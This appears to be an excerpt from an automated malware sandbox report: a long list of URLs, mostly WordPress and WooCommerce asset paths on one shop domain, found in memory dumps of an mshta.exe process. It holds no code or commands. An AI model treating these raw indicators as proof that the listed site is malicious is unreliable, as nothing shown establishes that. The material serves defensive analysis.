Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/slideout.js?ver=
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.c
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/js/front.js?v
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png)
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/minus.svg
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svg
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=1
Source: mshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver=1.
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=1.3
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rang
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.range
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipst
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundl
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bundle
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/password-strength-meter.min.j
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?v
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-w
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/th
Source: mshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5#
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;
Source: mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:
Source: mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5E
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5G
Source: mshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5T
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5da
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5UN
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347037B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5e.css?ver=2.3.7
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5pC:
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);br
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.17.5)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.17.5
Source: mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.17.5;
Source: mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/flatsome.js?ver=89ac940c4841291ea8d6
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6a
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aRs
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/assets/libs/infinite-scroll.pkgd.min.js?ver=4.0.1
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-infinite-scroll/flatsome-inf
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-instant-page/flatsome-instan
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-lazy-load/flatsome-lazy-load
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-se
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/thet
Source: mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/ugins/woo-discount-rules/v2/Assetss/awdr-dynamic-price.js?ver=2.3.8
Source: mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/cropped-logo-d-270x270.jpg
Source: mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.j
Source: mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpg
Source: mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.js.woff?v=3.17.5)
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpg
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xdohovir-oferty-280x280.png.pagespeed.ic.Us1ysJgC5g.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xlogo-gurt-m.png.pagespeed.ic.SkQgjUt9Ci.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xprofil-280x280.png.pagespeed.ic.A1jMtoXaMR.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xvidnovyty-parol-280x280.png.pagespeed.ic.FKw07L82hi.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.png
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/uploads/xznyzhky-280x280.png.pagespeed.ic.aW61iAx-0t.png
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=15
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E14F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1C:
